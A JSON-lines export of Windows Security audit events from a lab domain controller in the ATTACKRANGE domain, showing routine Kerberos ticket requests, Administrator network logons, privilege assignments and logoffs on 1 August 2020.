{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220626,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220627,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220628,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220629,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5269\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa5269","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220630,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5269\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa5269","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220631,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C184\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9c184","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220632,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE94\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be94","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220633,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5269\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa5269","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220634,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220635,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220636,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220637,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA52CE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa52ce","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220638,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA52CE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa52ce","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220639,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
